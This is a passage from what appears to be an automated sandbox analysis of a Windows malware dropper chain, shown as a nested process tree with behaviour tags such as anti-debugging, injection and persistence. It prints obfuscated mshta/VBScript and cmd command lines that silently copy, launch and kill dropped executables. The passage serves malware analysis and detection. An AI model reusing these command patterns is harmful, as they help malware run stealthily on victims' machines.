                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                      10⤵
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:5016
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:6804
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                            12⤵
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            PID:7564
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                              13⤵
                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                              PID:7604
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                14⤵
                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                PID:4464
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                  15⤵
                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                  PID:4448
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                    16⤵
                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                    PID:2748
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                      17⤵
                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                      PID:3712
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                        18⤵
                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                        PID:7824
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                          19⤵
                                                                                                                                                                                            PID:7992
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                              20⤵
                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                              PID:7240
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                21⤵
                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                PID:1532
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                  22⤵
                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                  PID:7828
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                    23⤵
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                    PID:2804
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                      24⤵
                                                                                                                                                                                                      • Drops startup file
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      PID:2480
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                                                        25⤵
                                                                                                                                                                                                          PID:5608
                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                      ping GFBFPSXA -n 30
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:5452
                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              PID:6036
                                                                                                                                                              • C:\Users\Admin\Documents\VJGgOvJz4Y4970ki16zGUFdY.exe
                                                                                                                                                                "C:\Users\Admin\Documents\VJGgOvJz4Y4970ki16zGUFdY.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                PID:6596
                                                                                                                                                              • C:\Users\Admin\Documents\afqkkEBWBfcAp_FG8OV4xQhk.exe
                                                                                                                                                                "C:\Users\Admin\Documents\afqkkEBWBfcAp_FG8OV4xQhk.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:6588
                                                                                                                                                                • C:\Users\Admin\Documents\afqkkEBWBfcAp_FG8OV4xQhk.exe
                                                                                                                                                                  C:\Users\Admin\Documents\afqkkEBWBfcAp_FG8OV4xQhk.exe
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:7080
                                                                                                                                                                  • C:\Users\Admin\Documents\afqkkEBWBfcAp_FG8OV4xQhk.exe
                                                                                                                                                                    C:\Users\Admin\Documents\afqkkEBWBfcAp_FG8OV4xQhk.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:5684
                                                                                                                                                                  • C:\Users\Admin\Documents\d2mjF6lI3WuHtqftZ8D7NuFY.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\d2mjF6lI3WuHtqftZ8D7NuFY.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                    PID:6692
                                                                                                                                                                  • C:\Users\Admin\Documents\arPBo9PK1ZlQ1jmO83YIUWeY.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\arPBo9PK1ZlQ1jmO83YIUWeY.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:6948
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-AH97C.tmp\arPBo9PK1ZlQ1jmO83YIUWeY.tmp
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-AH97C.tmp\arPBo9PK1ZlQ1jmO83YIUWeY.tmp" /SL5="$5029A,138429,56832,C:\Users\Admin\Documents\arPBo9PK1ZlQ1jmO83YIUWeY.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                        PID:7048
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-N65R0.tmp\Setup.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-N65R0.tmp\Setup.exe" /Verysilent
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:6736
                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                                              PID:7332
                                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629305979 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:7304
                                                                                                                                                                        • C:\Users\Admin\Documents\adx6uS0ZZRMvHZkWFZRevF39.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\adx6uS0ZZRMvHZkWFZRevF39.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          PID:7148
                                                                                                                                                                        • C:\Users\Admin\Documents\obUSglbjJhbMaKHcNiqnFLQ5.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\obUSglbjJhbMaKHcNiqnFLQ5.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:7156
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\5171169.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\5171169.exe"
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:4564
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\2729644.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\2729644.exe"
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                PID:6032
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\7580272.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\7580272.exe"
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:3288
                                                                                                                                                                              • C:\Users\Admin\Documents\yZtJOxrK7eSwOzOBjaLFZyAi.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\yZtJOxrK7eSwOzOBjaLFZyAi.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:6172
                                                                                                                                                                                  • C:\Users\Admin\Documents\yZtJOxrK7eSwOzOBjaLFZyAi.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\yZtJOxrK7eSwOzOBjaLFZyAi.exe"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:7532
                                                                                                                                                                                • C:\Users\Admin\Documents\7Yu_DBUDMYiHgXOtnGbiPWoG.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\7Yu_DBUDMYiHgXOtnGbiPWoG.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:6208
                                                                                                                                                                                  • C:\Users\Admin\Documents\nHDh7nAZrVtriFaWHA_sQmei.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\nHDh7nAZrVtriFaWHA_sQmei.exe"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:6304
                                                                                                                                                                                    • C:\Users\Admin\Documents\nHDh7nAZrVtriFaWHA_sQmei.exe
                                                                                                                                                                                      C:\Users\Admin\Documents\nHDh7nAZrVtriFaWHA_sQmei.exe
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:4708
                                                                                                                                                                                      • C:\Users\Admin\Documents\nHDh7nAZrVtriFaWHA_sQmei.exe
                                                                                                                                                                                        C:\Users\Admin\Documents\nHDh7nAZrVtriFaWHA_sQmei.exe
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:3404
                                                                                                                                                                                      • C:\Users\Admin\Documents\c4cUag47fi4kk6k1jYHncLTk.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\c4cUag47fi4kk6k1jYHncLTk.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:5820
                                                                                                                                                                                        • C:\Users\Admin\Documents\f8LotkZIG0IjUcgo07Tj5ATy.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\f8LotkZIG0IjUcgo07Tj5ATy.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:5756
                                                                                                                                                                                          • C:\Users\Admin\Documents\JK5x0ZiTxQv6GsG4woiqR9nF.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\JK5x0ZiTxQv6GsG4woiqR9nF.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                            PID:5920
                                                                                                                                                                                          • C:\Users\Admin\Documents\q45Hudo471JLl74FZRdFVFjq.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\q45Hudo471JLl74FZRdFVFjq.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:6420
                                                                                                                                                                                            • C:\Users\Admin\Documents\OS4hDlEurA1DM8DDKMbqgSYp.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\OS4hDlEurA1DM8DDKMbqgSYp.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                              PID:6568
                                                                                                                                                                                              • C:\Users\Admin\Documents\OS4hDlEurA1DM8DDKMbqgSYp.exe
                                                                                                                                                                                                "C:\Users\Admin\Documents\OS4hDlEurA1DM8DDKMbqgSYp.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                PID:6128
                                                                                                                                                                                            • C:\Users\Admin\Documents\WtAa6RiZLKm8QsARIkgqTbw5.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\WtAa6RiZLKm8QsARIkgqTbw5.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                              PID:5388
                                                                                                                                                                                              • C:\Users\Admin\Documents\WtAa6RiZLKm8QsARIkgqTbw5.exe
                                                                                                                                                                                                C:\Users\Admin\Documents\WtAa6RiZLKm8QsARIkgqTbw5.exe
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:6672
                                                                                                                                                                                              • C:\Users\Admin\Documents\4StsK0lX9tiv3WgycWb6yuIa.exe
                                                                                                                                                                                                "C:\Users\Admin\Documents\4StsK0lX9tiv3WgycWb6yuIa.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:6688
                                                                                                                                                                                                • C:\Users\Admin\Documents\dsqRvh73FCAXRMOPXVPJGlPU.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\dsqRvh73FCAXRMOPXVPJGlPU.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:6716
                                                                                                                                                                                                    • C:\Users\Admin\Documents\dsqRvh73FCAXRMOPXVPJGlPU.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\dsqRvh73FCAXRMOPXVPJGlPU.exe" -q
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:5884
                                                                                                                                                                                                    • C:\Users\Admin\Documents\h5qP3DANHIHT2ydPZljGyp8f.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\h5qP3DANHIHT2ydPZljGyp8f.exe"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                      PID:6800
                                                                                                                                                                                                    • C:\Users\Admin\Documents\dOo14n79Xmm1XrKfzQhSEYhe.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\dOo14n79Xmm1XrKfzQhSEYhe.exe"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                      PID:5800
                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\dOo14n79Xmm1XrKfzQhSEYhe.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\dOo14n79Xmm1XrKfzQhSEYhe.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:6828
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\dOo14n79Xmm1XrKfzQhSEYhe.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\dOo14n79Xmm1XrKfzQhSEYhe.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:7856
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                                                                                                                                                                hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                  PID:8116
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:8164
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                          PID:8188
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                        "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        PID:7476
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                      taskkill -f -iM "dOo14n79Xmm1XrKfzQhSEYhe.exe"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:7288
                                                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:5908
                                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:4004
                                                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5864
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\8198080.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\8198080.exe"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:4244
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3521973.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3521973.exe"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                  PID:5264
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\8372601.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\8372601.exe"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:4180
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3661752.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3661752.exe"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:5196
                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                            PID:5500
                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:5088
                                                                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                            PID:5712
                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding DE996264B7BE6EAF5B999A200E8AB5CD C
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:7384
                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 8010BAB60FB33DBFA967E6A4439E3672 C
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:7840
                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 975B8F2C53CDAF2D337CD58075B26433 C
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:7668
                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 50CD31677A223D462750C9205C688E57
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:4424
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                              PID:8112
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                PID:8776
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                  PID:9196
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffd87afdec0,0x7ffd87afded0,0x7ffd87afdee0
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:7492
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1504,6795175324739899831,4316020826980761426,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9196_230896758" --mojo-platform-channel-handle=1812 /prefetch:8
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                                      PID:6792
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1504,6795175324739899831,4316020826980761426,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9196_230896758" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1520 /prefetch:2
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:8868
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
